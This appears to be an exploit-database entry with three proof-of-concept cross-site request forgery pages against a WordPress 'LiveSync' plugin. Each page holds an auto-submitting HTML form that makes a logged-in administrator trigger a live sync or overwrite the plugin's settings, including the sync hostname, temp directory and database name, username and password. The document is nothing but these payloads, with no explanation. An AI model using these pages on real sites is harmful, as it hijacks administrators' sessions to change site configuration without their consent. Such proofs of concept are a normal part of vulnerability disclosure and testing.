Share
## https://sploitus.com/exploit?id=WPEX-ID:9AB9626F-66D5-47E4-BDB8-D8FB519F9515
<form id="test" action="https://example.com/wp-admin/tools.php?page=livesync/livesync.php" method="POST">
    <input type="text" name="livesync_go" value="true">
    <input type="text" name="Submit" value="Synchronise Live »">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=livesync/livesync.php" method="POST">
    <input type="text" name="livesync_updateoptions" value="true">
    <input type="text" name="livesync_hostname" value="aaa">
    <input type="text" name="livesync_tempdir" value="/tmp">
    <input type="text" name="livesync_usedefaults" value="true">
    <input type="text" name="Submit" value="Update Options »">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=livesync/livesync.php" method="POST">
    <input type="text" name="livesync_updateoptions" value="true">
    <input type="text" name="livesync_hostname" value="www">
    <input type="text" name="livesync_tempdir" value="/tmp">
    <input type="text" name="livesync_database" value="www">
    <input type="text" name="livesync_username" value="wwww">
    <input type="text" name="livesync_password" value="wwwwwww">
    <input type="text" name="Submit" value="Update Options »">
</form>
<script>
    document.getElementById("test").submit();
</script>